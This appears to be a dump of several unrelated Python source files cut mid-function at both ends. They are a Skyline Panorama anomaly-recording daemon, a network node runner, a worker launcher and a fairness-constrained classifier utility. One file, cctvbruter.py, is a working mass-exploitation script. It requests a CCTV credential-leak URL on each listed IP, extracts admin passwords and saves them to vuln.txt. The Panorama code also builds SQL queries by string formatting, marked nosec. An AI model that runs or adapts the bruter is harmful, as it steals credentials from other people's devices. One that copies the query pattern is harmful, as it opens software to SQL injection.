fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not triggered_algorithms: logger.error('error :: failed to load triggered_algorithms variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return app = None try: # metric_vars.app # app = str(metric_vars.app) key = 'app' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] app = str(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - app - %s' % app) except: logger.error('error :: failed to read app variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not app: logger.error('error :: failed to load app variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return source = None try: # metric_vars.source # source = str(metric_vars.source) key = 'source' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] source = str(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - source - %s' % source) except: logger.error('error :: failed to read source variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not app: logger.error('error :: failed to load app variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return added_by = None try: # metric_vars.added_by # added_by = str(metric_vars.added_by) key = 'added_by' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] added_by = str(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - added_by - %s' % added_by) except: logger.error('error :: failed to read added_by variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not added_by: logger.error('error :: failed to load added_by variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return added_at = None try: # metric_vars.added_at # added_at = str(metric_vars.added_at) key = 'added_at' value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key] added_at = str(value_list[0]) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: metric variable - added_at - %s' % added_at) except: logger.error('error :: failed to read added_at variable from check file setting to all - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return if not added_at: logger.error('error :: failed to load added_at variable from check file - %s' % (metric_check_file)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return record_anomaly = True cache_key = '%s.last_check.%s.%s' % (skyline_app, app, metric) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: cache_key - %s.last_check.%s.%s' % ( skyline_app, app, metric)) try: last_check = self.redis_conn.get(cache_key) except Exception as e: logger.error( 'error :: could not query cache_key - %s.last_check.%s.%s - %s' % ( skyline_app, app, metric, e)) last_check = None if last_check: record_anomaly = False logger.info( 'Panorama metric key not expired - %s.last_check.%s.%s' % ( skyline_app, app, metric)) # @added 20160907 - Handle Panorama stampede on restart after not running #26 # Allow to expire check if greater than PANORAMA_CHECK_MAX_AGE if max_age: now = time() anomaly_age = int(now) - int(metric_timestamp) if anomaly_age > max_age_seconds: record_anomaly = False logger.info( 'Panorama check max age exceeded - %s - %s seconds old, older than %s seconds discarding' % ( metric, str(anomaly_age), str(max_age_seconds))) if not record_anomaly: logger.info('not recording anomaly for - %s' % (metric)) if os.path.isfile(str(metric_check_file)): try: os.remove(str(metric_check_file)) logger.info('metric_check_file removed - %s' % str(metric_check_file)) except OSError: pass return # Determine id of something thing def determine_id(table, key, value): """ Get the id of something from Redis or the database and create a new Redis key with the value if one does not exist. :param table: table name :param key: key name :param value: value name :type table: str :type key: str :type value: str :return: int or boolean """ query_cache_key = '%s.mysql_ids.%s.%s.%s' % (skyline_app, table, key, value) determined_id = None redis_determined_id = None if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: query_cache_key - %s' % (query_cache_key)) try: redis_known_id = self.redis_conn.get(query_cache_key) except: redis_known_id = None if redis_known_id: unpacker = Unpacker(use_list=False) unpacker.feed(redis_known_id) redis_determined_id = list(unpacker) if redis_determined_id: determined_id = int(redis_determined_id[0]) if determined_id: if determined_id > 0: return determined_id # Query MySQL # @modified 20170913 - Task #2160: Test skyline with bandit # Added nosec to exclude from bandit tests query = 'select id FROM %s WHERE %s=\'%s\'' % (table, key, value) # nosec # @modified 20170916 - Bug #2166: panorama incorrect mysql_id cache keys # Wrap in except # results = self.mysql_select(query) results = None try: results = self.mysql_select(query) except: logger.error('error :: failed to determine results from - %s' % (query)) determined_id = 0 if results: try: determined_id = int(results[0][0]) except Exception as e: logger.error(traceback.format_exc()) logger.error('error :: determined_id is not an int') determined_id = 0 if determined_id > 0: # Set the key for a week if not redis_determined_id: try: self.redis_conn.setex(query_cache_key, 604800, packb(determined_id)) logger.info('set redis query_cache_key - %s - id: %s' % ( query_cache_key, str(determined_id))) except Exception as e: logger.error(traceback.format_exc()) logger.error('error :: failed to set query_cache_key - %s - id: %s' % ( query_cache_key, str(determined_id))) return int(determined_id) # @added 20170115 - Feature #1854: Ionosphere learn - generations # Added determination of the learn related variables # learn_full_duration_days, learn_valid_ts_older_than, # max_generations and max_percent_diff_from_origin value to the # insert statement if the table is the metrics table. if table == 'metrics' and key == 'metric': # Set defaults learn_full_duration_days = int(settings.IONOSPHERE_LEARN_DEFAULT_FULL_DURATION_DAYS) valid_learning_duration = int(settings.IONOSPHERE_LEARN_DEFAULT_VALID_TIMESERIES_OLDER_THAN_SECONDS) max_generations = int(settings.IONOSPHERE_LEARN_DEFAULT_MAX_GENERATIONS) max_percent_diff_from_origin = float(settings.IONOSPHERE_LEARN_DEFAULT_MAX_PERCENT_DIFF_FROM_ORIGIN) try: use_full_duration, valid_learning_duration, use_full_duration_days, max_generations, max_percent_diff_from_origin = get_ionosphere_learn_details(skyline_app, value) learn_full_duration_days = use_full_duration_days except: logger.error(traceback.format_exc()) logger.error('error :: failed to get_ionosphere_learn_details for %s' % value) logger.info('metric learn details determined for %s' % value) logger.info('learn_full_duration_days :: %s days' % (str(learn_full_duration_days))) logger.info('valid_learning_duration :: %s seconds' % (str(valid_learning_duration))) logger.info('max_generations :: %s' % (str(max_generations))) logger.info('max_percent_diff_from_origin :: %s' % (str(max_percent_diff_from_origin))) # INSERT because no known id # @modified 20170115 - Feature #1854: Ionosphere learn - generations # Added the learn_full_duration_days, learn_valid_ts_older_than, # max_generations and max_percent_diff_from_origin value to the # insert statement if the table is the metrics table. # insert_query = 'insert into %s (%s) VALUES (\'%s\')' % (table, key, value) if table == 'metrics' and key == 'metric': # @modified 20170913 - Task #2160: Test skyline with bandit # Added nosec to exclude from bandit tests insert_query_string = '%s (%s, learn_full_duration_days, learn_valid_ts_older_than, max_generations, max_percent_diff_from_origin) VALUES (\'%s\', %s, %s, %s, %s)' % ( table, key, value, str(learn_full_duration_days), str(valid_learning_duration), str(max_generations), str(max_percent_diff_from_origin)) insert_query = 'insert into %s' % insert_query_string # nosec else: insert_query = 'insert into %s (%s) VALUES (\'%s\')' % (table, key, value) # nosec logger.info('inserting %s into %s table' % (value, table)) try: results = self.mysql_insert(insert_query) except: logger.error(traceback.format_exc()) logger.error('error :: failed to determine the id of %s from the insert' % (value)) raise determined_id = 0 if results: determined_id = int(results) else: logger.error('error :: results not set') raise if determined_id > 0: # Set the key for a week if not redis_determined_id: try: self.redis_conn.setex(query_cache_key, 604800, packb(determined_id)) logger.info('set redis query_cache_key - %s - id: %s' % ( query_cache_key, str(determined_id))) except Exception as e: logger.error(traceback.format_exc()) logger.error('%s' % str(e)) logger.error('error :: failed to set query_cache_key - %s - id: %s' % ( query_cache_key, str(determined_id))) return determined_id logger.error('error :: failed to determine the inserted id for %s' % value) return False try: added_by_host_id = determine_id('hosts', 'host', added_by) except: logger.error('error :: failed to determine id of %s' % (added_by)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: app_id = determine_id('apps', 'app', app) except: logger.error('error :: failed to determine id of %s' % (app)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: source_id = determine_id('sources', 'source', source) except: logger.error('error :: failed to determine id of %s' % (source)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: metric_id = determine_id('metrics', 'metric', metric) except: logger.error('error :: failed to determine id of %s' % (metric)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False algorithms_ids_csv = '' for algorithm in algorithms: try: algorithm_id = determine_id('algorithms', 'algorithm', algorithm) except: logger.error('error :: failed to determine id of %s' % (algorithm)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False if algorithms_ids_csv == '': algorithms_ids_csv = str(algorithm_id) else: new_algorithms_ids_csv = '%s,%s' % (algorithms_ids_csv, str(algorithm_id)) algorithms_ids_csv = new_algorithms_ids_csv triggered_algorithms_ids_csv = '' for triggered_algorithm in triggered_algorithms: try: triggered_algorithm_id = determine_id('algorithms', 'algorithm', triggered_algorithm) except: logger.error('error :: failed to determine id of %s' % (triggered_algorithm)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False if triggered_algorithms_ids_csv == '': triggered_algorithms_ids_csv = str(triggered_algorithm_id) else: new_triggered_algorithms_ids_csv = '%s,%s' % ( triggered_algorithms_ids_csv, str(triggered_algorithm_id)) triggered_algorithms_ids_csv = new_triggered_algorithms_ids_csv logger.info('inserting anomaly') try: full_duration = int(metric_timestamp) - int(from_timestamp) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: full_duration - %s' % str(full_duration)) except: logger.error('error :: failed to determine full_duration') fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: anomalous_datapoint = round(float(value), 6) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: anomalous_datapoint - %s' % str(anomalous_datapoint)) except: logger.error('error :: failed to determine anomalous_datapoint') fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: columns = '%s, %s, %s, %s, %s, %s, %s, %s, %s' % ( 'metric_id', 'host_id', 'app_id', 'source_id', 'anomaly_timestamp', 'anomalous_datapoint', 'full_duration', 'algorithms_run', 'triggered_algorithms') if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: columns - %s' % str(columns)) except: logger.error('error :: failed to construct columns string') logger.info(traceback.format_exc()) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False try: # @modified 20170913 - Task #2160: Test skyline with bandit # Added nosec to exclude from bandit tests query_string = '(%s) VALUES (%d, %d, %d, %d, %s, %.6f, %d, \'%s\', \'%s\')' % ( columns, metric_id, added_by_host_id, app_id, source_id, metric_timestamp, anomalous_datapoint, full_duration, algorithms_ids_csv, triggered_algorithms_ids_csv) query = 'insert into anomalies %s' % query_string # nosec except: logger.error('error :: failed to construct insert query') logger.info(traceback.format_exc()) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: anomaly insert - %s' % str(query)) try: anomaly_id = self.mysql_insert(query) logger.info('anomaly id - %d - created for %s at %s' % ( anomaly_id, metric, metric_timestamp)) except: logger.error('error :: failed to insert anomaly %s at %s' % ( anomaly_id, metric, metric_timestamp)) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) return False # Set anomaly record cache key try: self.redis_conn.setex( cache_key, settings.PANORAMA_EXPIRY_TIME, packb(value)) logger.info('set cache_key - %s.last_check.%s.%s - %s' % ( skyline_app, app, metric, str(settings.PANORAMA_EXPIRY_TIME))) except Exception as e: logger.error( 'error :: could not query cache_key - %s.last_check.%s.%s - %s' % ( skyline_app, app, metric, e)) if os.path.isfile(str(metric_check_file)): try: os.remove(str(metric_check_file)) logger.info('metric_check_file removed - %s' % str(metric_check_file)) except OSError: pass return anomaly_id def run(self): """ Called when the process intializes. Determine if what is known in the Skyline DB blah """ # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: logger.info('removing %s' % skyline_app_logwait) os.remove(skyline_app_logwait) except OSError: logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os.remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) # See if I am known in the DB, if so, what are my variables # self.populate mysql # What is my host id in the Skyline panorama DB? # - if not known - INSERT hostname INTO hosts # What are the known apps? # - if returned make a dictionary # What are the known algorithms? # - if returned make a dictionary while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() if ENABLE_PANORAMA_DEBUG: logger.info('debug :: connected to Redis') except: logger.error('error :: cannot connect to redis at socket path %s' % ( settings.REDIS_SOCKET_PATH)) sleep(30) # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow if settings.REDIS_PASSWORD: self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH) else: self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) continue # Report app up try: self.redis_conn.setex(skyline_app, 120, now) logger.info('updated Redis key for %s up' % skyline_app) except: logger.error('error :: failed to update Redis key for %s up' % skyline_app) if ENABLE_PANORAMA_DEBUG: # Make sure mysql is available mysql_down = True while mysql_down: query = 'SHOW TABLES' results = self.mysql_select(query) if results: mysql_down = False logger.info('debug :: tested database query - OK') else: logger.error('error :: failed to query database') sleep(30) if ENABLE_PANORAMA_DEBUG: try: query = 'SELECT id, test FROM test' result = self.mysql_select(query) logger.info('debug :: tested mysql SELECT query - OK') logger.info('debug :: result: %s' % str(result)) logger.info('debug :: result[0]: %s' % str(result[0])) logger.info('debug :: result[1]: %s' % str(result[1])) # Works # 2016-06-10 19:07:23 :: 4707 :: result: [(1, u'test1')] except: logger.error( 'error :: mysql error - %s' % traceback.print_exc()) logger.error('error :: failed to SELECT') # self.populate the database metatdata tables # What is my host id in the Skyline panorama DB? host_id = False # @modified 20170913 - Task #2160: Test skyline with bandit # Added nosec to exclude from bandit tests query = 'select id FROM hosts WHERE host=\'%s\'' % this_host # nosec results = self.mysql_select(query) if results: host_id = results[0][0] logger.info('host_id: %s' % str(host_id)) else: logger.info('failed to determine host id of %s' % this_host) # - if not known - INSERT hostname INTO host if not host_id: logger.info('inserting %s into hosts table' % this_host) # @modified 20170913 - Task #2160: Test skyline with bandit # Added nosec to exclude from bandit tests query = 'insert into hosts (host) VALUES (\'%s\')' % this_host # nosec host_id = self.mysql_insert(query) if host_id: logger.info('new host_id: %s' % str(host_id)) if not host_id: logger.error( 'error :: failed to determine populate %s into the hosts table' % this_host) sleep(30) continue # Like loop through the panorama dir and see if anyone has left you # any work, etc # Make sure check_dir exists and has not been removed try: if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: checking check dir exists - %s' % settings.PANORAMA_CHECK_PATH) os.path.exists(settings.PANORAMA_CHECK_PATH) except: logger.error('error :: check dir did not exist - %s' % settings.PANORAMA_CHECK_PATH) mkdir_p(settings.PANORAMA_CHECK_PATH) logger.info('check dir created - %s' % settings.PANORAMA_CHECK_PATH) os.path.exists(settings.PANORAMA_CHECK_PATH) # continue """ Determine if any metric has been added to add """ while True: metric_var_files = False try: metric_var_files = [f for f in listdir(settings.PANORAMA_CHECK_PATH) if isfile(join(settings.PANORAMA_CHECK_PATH, f))] except: logger.error('error :: failed to list files in check dir') logger.info(traceback.format_exc()) if not metric_var_files: logger.info('sleeping 20 no metric check files') sleep(20) # Discover metric anomalies to insert metric_var_files = False try: metric_var_files = [f for f in listdir(settings.PANORAMA_CHECK_PATH) if isfile(join(settings.PANORAMA_CHECK_PATH, f))] except: logger.error('error :: failed to list files in check dir') logger.info(traceback.format_exc()) if metric_var_files: break # @added 20190501 - Branch #2646: slack # Check if any Redis keys exist with a slack_thread_ts to update # any anomaly records slack_thread_ts_updates = None # @added 20190523 - Branch #3002: docker # Branch #2646: slack # Only check if slack is enabled if SLACK_ENABLED: try: slack_thread_ts_updates = list(self.redis_conn.scan_iter(match='panorama.slack_thread_ts.*')) except: logger.error(traceback.format_exc()) logger.error('error :: failed to scan panorama.slack_thread_ts.* from Redis') slack_thread_ts_updates = [] if not slack_thread_ts_updates: logger.info('no panorama.slack_thread_ts Redis keys to process, OK') if slack_thread_ts_updates: for cache_key in slack_thread_ts_updates: base_name = None metric_timestamp = None try: update_on = self.redis_conn.get(cache_key) # cache_key_value = [base_name, metric_timestamp, slack_thread_ts] update_for = literal_eval(update_on) base_name = str(update_for[0]) metric_timestamp = int(float(update_for[1])) slack_thread_ts = float(update_for[2]) except: logger.error(traceback.format_exc()) logger.error('error :: failed to get details from cache_key %s' % cache_key) update_db_record = False if base_name and metric_timestamp: update_db_record = True else: logger.info('Could not determine base_name and metric_timestamp from cache_key %s, deleting' % cache_key) try: self.redis_conn.delete(cache_key) except: logger.error(traceback.format_exc()) logger.error('error :: failed to delete cache_key %s' % cache_key) if update_db_record: # Spawn update_slack_thread_ts process pids = [] spawned_pids = [] pid_count = 0 now = time() for i in range(1, 2): try: p = Process(target=self.update_slack_thread_ts, args=(i, base_name, metric_timestamp, slack_thread_ts)) pids.append(p) pid_count += 1 logger.info('starting update_slack_thread_ts') p.start() spawned_pids.append(p.pid) except: logger.info(traceback.format_exc()) logger.error('error :: to start update_slack_thread_ts') continue p_starts = time() # @modified 20190509 - Branch #2646: slack # If the Skyline MySQL database is on a remote host # 2 seconds here is sometimes not sufficient so # increased to 10 while time() - p_starts <= 10: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - p_starts logger.info( '%s :: update_slack_thread_ts completed in %.2f seconds' % ( skyline_app, time_to_run)) break else: # We only enter this if we didn't 'break' above. logger.info('%s :: timed out, killing all update_slack_thread_ts processes' % (skyline_app)) for p in pids: p.terminate() metric_var_files_sorted = sorted(metric_var_files) metric_check_file = '%s/%s' % (settings.PANORAMA_CHECK_PATH, str(metric_var_files_sorted[0])) logger.info('assigning anomaly for insertion - %s' % str(metric_var_files_sorted[0])) # Spawn processes pids = [] spawned_pids = [] pid_count = 0 now = time() for i in range(1, settings.PANORAMA_PROCESSES + 1): try: p = Process(target=self.spin_process, args=(i, metric_check_file)) pids.append(p) pid_count += 1 logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.PANORAMA_PROCESSES))) p.start() spawned_pids.append(p.pid) except: logger.error('error :: to start spin_process') logger.info(traceback.format_exc()) continue # Send wait signal to zombie processes # for p in pids: # p.join() # Self monitor processes and terminate if any spin_process has run # for longer than CRUCIBLE_TESTS_TIMEOUT p_starts = time() while time() - p_starts <= 20: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - p_starts logger.info( '%s :: %s spin_process/es completed in %.2f seconds' % ( skyline_app, str(settings.PANORAMA_PROCESSES), time_to_run)) break else: # We only enter this if we didn't 'break' above. logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app)) for p in pids: p.terminate() # p.join() check_file_name = os.path.basename(str(metric_check_file)) if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_name - %s' % check_file_name) check_file_timestamp = check_file_name.split('.', 1)[0] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp)) check_file_metricname_txt = check_file_name.split('.', 1)[1] if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt) check_file_metricname = check_file_metricname_txt.replace('.txt', '') if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname - %s' % check_file_metricname) check_file_metricname_dir = check_file_metricname.replace('.', '/') if settings.ENABLE_PANORAMA_DEBUG: logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir) metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp) fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file)) for p in pids: if p.is_alive(): logger.info('%s :: stopping spin_process - %s' % (skyline_app, str(p.is_alive()))) p.join()
run.py
from node import Node import threading f = open("input", 'r') lines = f.readlines() n = int(lines[0]) nodes = {} for i in range(1, n+1): nodes[i] = Node(uid=i, network_size=n) uid = -1 for i in range((n * n) + 1): if len(lines[i].split()) == 4: tokens = lines[i].split() uid = int(tokens[0]) nodes[uid].start_delay = int(tokens[1]) nodes[uid].potential_leader_time_out = int(tokens[2]) nodes[uid].propose_time_out = int(tokens[3]) elif len(lines[i].split()) == 2: tokens = lines[i].split() address = nodes[int(tokens[0])].address nodes[uid].stream.add_sender(address, float(tokens[1])) nodes[uid].outgoing_addresses[int(tokens[0])] = address for node in nodes.values(): threading.Thread(target=node.run).start()
cctvbruter.py
#!/usr/bin/python # Bruteforce tool for CCTV RCE Exploit # You don't have to edit anything. import urllib.request, threading, socket, time, sys if len(sys.argv) != 2: print("Correct useage: python " + sys.argv[0].split("\\").pop() + " <thread count> ") sys.exit() lock, finalprintout, timeout, creds, threads, threadcount, leak, total = threading.Lock(), "", 5, [], [], int(sys.argv[1]), "http://TARGET/system.ini?loginuse&loginpas", 0 # Open output.txt list = open("output.txt", "r") scan = list.read() list.close() scan = scan.split("\n") while "\n" in scan: scan.remove("\n") pretotal = len(scan) def dumpcreds(): global finalprintout global total global scan while len(scan) > 0: try: with lock: ip = scan.pop() with urllib.request.urlopen(leak.replace("TARGET", ip), None, timeout) as response: reply = str(response.read()) if reply.find("admin") != -1: reply = reply[reply.find("admin"):] while reply.find("\\x00") != -1: reply = reply.replace("\\x00", "") password = reply[5:reply.find("\\")] if password.find("/") != -1: password = password[:password.find("/")] print("\x1b[0;37m[\x1b[0;35m*\x1b[0;37m] |\x1b[0;35mFound\x1b[0;37m| admin:" + password + "@" + ip) with lock: finalprintout += ip + ":admin:" + password + "\n" total += 1 except: pass print(" \x1b[1;37m[\x1b[1;35m+\x1b[1;37m] \x1b[1;35mCCTV Camera Exploit \x1b[1;37m[\x1b[1;35m+\x1b[1;37m]\x1b[0m") print(" \x1b[1;37m[\x1b[1;31m*\x1b[1;37m] \x1b[1;36mCredits go to รขหœโ€ฆCamรขหœโ€ฆ \x1b[1;37m[\x1b[1;31m*\x1b[1;37m]") time.sleep(6) print(" \x1b[1;35mDumping Credentials, please wait") time.sleep(4) for i in range(0, threadcount+1): threads.append(threading.Thread(target=dumpcreds)) for thread in threads: try: thread.daemon = True thread.start() except: pass for thread in threads: try: thread.join() except: pass while 1: time.sleep(1) done = False for thread in threads: if thread.isAlive() == True: done = False break else: done = True if done == True: writingit = open("vuln.txt", "w") writingit.write(finalprintout) writingit.close() print(str(total) + " of out " + str(pretotal) + " credentials dumped, " + str(int(100 / pretotal * total)) + "% success rate. ") break
run_worker.py
import multiprocessing import time import argparse from workers.km_worker import start_worker import workers.loaded_index as li parser = argparse.ArgumentParser() parser.add_argument('-w', '--workers', default=1) args = parser.parse_args() def start_workers(do_multiprocessing = True): n_workers = args.workers if type(n_workers) is str: n_workers = int(n_workers) if do_multiprocessing: worker_processes = [] for i in range(0, n_workers): p = multiprocessing.Process(target=start_worker) worker_processes.append(p) p.start() while True: # if a worker process is dead, restart it time.sleep(5) for i, worker in enumerate(worker_processes): if not worker or not worker.is_alive(): p = multiprocessing.Process(target=start_worker) worker_processes[i] = p p.start() else: start_worker() def main(): print('workers waiting 10 sec for redis to set up...') time.sleep(10) li.data_path = '/mnt/fast_km-data' start_workers() if __name__ == '__main__': main()
utils.py
import numpy as np from random import seed, shuffle import loss_funcs as lf # our implementation of loss funcs from scipy.optimize import minimize # for loss func minimization from multiprocessing import Pool, Process, Queue from collections import defaultdict from copy import deepcopy import matplotlib.pyplot as plt # for plotting stuff import sys def train_model(x, y, x_control, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_thresh, gamma=None): #print x[0],y[0],x_control, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_thresh """ Function that trains the model subject to various fairness constraints. If no constraints are given, then simply trains an unaltered classifier. Example usage in: "synthetic_data_demo/decision_boundary_demo.py" ---- Inputs: X: (n) x (d+1) numpy array -- n = number of examples, d = number of features, one feature is the intercept y: 1-d numpy array (n entries) x_control: dictionary of the type {"s": [...]}, key "s" is the sensitive feature name, and the value is a 1-d list with n elements holding the sensitive feature values loss_function: the loss function that we want to optimize -- for now we have implementation of logistic loss, but other functions like hinge loss can also be added apply_fairness_constraints: optimize accuracy subject to fairness constraint (0/1 values) apply_accuracy_constraint: optimize fairness subject to accuracy constraint (0/1 values) sep_constraint: apply the fine grained accuracy constraint for details, see Section 3.3 of arxiv.org/abs/1507.05259v3 For examples on how to apply these constraints, see "synthetic_data_demo/decision_boundary_demo.py" Note: both apply_fairness_constraints and apply_accuracy_constraint cannot be 1 at the same time sensitive_attrs: ["s1", "s2", ...], list of sensitive features for which to apply fairness constraint, all of these sensitive features should have a corresponding array in x_control sensitive_attrs_to_cov_thresh: the covariance threshold that the classifier should achieve (this is only needed when apply_fairness_constraints=1, not needed for the other two constraints) gamma: controls the loss in accuracy we are willing to incur when using apply_accuracy_constraint and sep_constraint ---- Outputs: w: the learned weight vector for the classifier """ assert((apply_accuracy_constraint == 1 and apply_fairness_constraints == 1) == False) # both constraints cannot be applied at the same time max_iter = 100000 # maximum number of iterations for the minimization algorithm if apply_fairness_constraints == 0: constraints = [] else: constraints = get_constraint_list_cov(x, y, x_control, sensitive_attrs, sensitive_attrs_to_cov_thresh) if apply_accuracy_constraint == 0: #its not the reverse problem, just train w with cross cov constraints f_args=(x, y) w = minimize(fun = loss_function, x0 = np.random.rand(x.shape[1],), args = f_args, method = 'SLSQP', options = {"maxiter":max_iter}, constraints = constraints ) else: # train on just the loss function w = minimize(fun = loss_function, x0 = np.random.rand(x.shape[1],), args = (x, y), method = 'SLSQP', options = {"maxiter":max_iter}, constraints = [] ) old_w = deepcopy(w.x) def constraint_gamma_all(w, x, y, initial_loss_arr): gamma_arr = np.ones_like(y) * gamma # set gamma for everyone new_loss = loss_function(w, x, y) old_loss = sum(initial_loss_arr) return ((1.0 + gamma) * old_loss) - new_loss def constraint_protected_people(w,x,y): # dont confuse the protected here with the sensitive feature protected/non-protected values -- protected here means that these points should not be misclassified to negative class return np.dot(w, x.T) # if this is positive, the constraint is satisfied def constraint_unprotected_people(w,ind,old_loss,x,y): new_loss = loss_function(w, np.array([x]), np.array(y)) return ((1.0 + gamma) * old_loss) - new_loss constraints = [] predicted_labels = np.sign(np.dot(w.x, x.T)) unconstrained_loss_arr = loss_function(w.x, x, y, return_arr=True) if sep_constraint == True: # separate gemma for different people for i in range(0, len(predicted_labels)): if predicted_labels[i] == 1.0 and x_control[sensitive_attrs[0]][i] == 1.0: # for now we are assuming just one sensitive attr for reverse constraint, later, extend the code to take into account multiple sensitive attrs c = ({'type': 'ineq', 'fun': constraint_protected_people, 'args':(x[i], y[i])}) # this constraint makes sure that these people stay in the positive class even in the modified classifier constraints.append(c) else: c = ({'type': 'ineq', 'fun': constraint_unprotected_people, 'args':(i, unconstrained_loss_arr[i], x[i], y[i])}) constraints.append(c) else: # same gamma for everyone c = ({'type': 'ineq', 'fun': constraint_gamma_all, 'args':(x,y,unconstrained_loss_arr)}) constraints.append(c) def cross_cov_abs_optm_func(weight_vec, x_in, x_control_in_arr): cross_cov = (x_control_in_arr - np.mean(x_control_in_arr)) * np.dot(weight_vec, x_in.T) return float(abs(sum(cross_cov))) / float(x_in.shape[0]) w = minimize(fun = cross_cov_abs_optm_func, x0 = old_w, args = (x, x_control[sensitive_attrs[0]]), method = 'SLSQP', options = {"maxiter":100000}, constraints = constraints ) return w.x def compute_cross_validation_error(x_all, y_all, x_control_all, num_folds, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_thresh_arr, gamma=None): """ Computes the cross validation error for the classifier subject to various fairness constraints This function is just a wrapper of "train_model(...)", all inputs (except for num_folds) are the same. See the specifications of train_model(...) for more info. Returns lists of train/test accuracy (with each list holding values for all folds), the fractions of various sensitive groups in positive class (for train and test sets), and covariance between sensitive feature and distance from decision boundary (again, for both train and test folds). """ train_folds = [] test_folds = [] n_samples = len(y_all) train_fold_size = 0.7 # the rest of 0.3 is for testing # split the data into folds for cross-validation for i in range(0,num_folds): perm = range(0,n_samples) # shuffle the data before creating each fold shuffle(perm) x_all_perm = x_all[perm] y_all_perm = y_all[perm] x_control_all_perm = {} for k in x_control_all.keys(): x_control_all_perm[k] = np.array(x_control_all[k])[perm] x_all_train, y_all_train, x_control_all_train, x_all_test, y_all_test, x_control_all_test = split_into_train_test(x_all_perm, y_all_perm, x_control_all_perm, train_fold_size) train_folds.append([x_all_train, y_all_train, x_control_all_train]) test_folds.append([x_all_test, y_all_test, x_control_all_test]) def train_test_single_fold(train_data, test_data, fold_num, output_folds, sensitive_attrs_to_cov_thresh): x_train, y_train, x_control_train = train_data x_test, y_test, x_control_test = test_data w = train_model(x_train, y_train, x_control_train, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_thresh, gamma) train_score, test_score, correct_answers_train, correct_answers_test = check_accuracy(w, x_train, y_train, x_test, y_test, None, None) distances_boundary_test = (np.dot(x_test, w)).tolist() all_class_labels_assigned_test = np.sign(distances_boundary_test) correlation_dict_test = get_correlations(None, None, 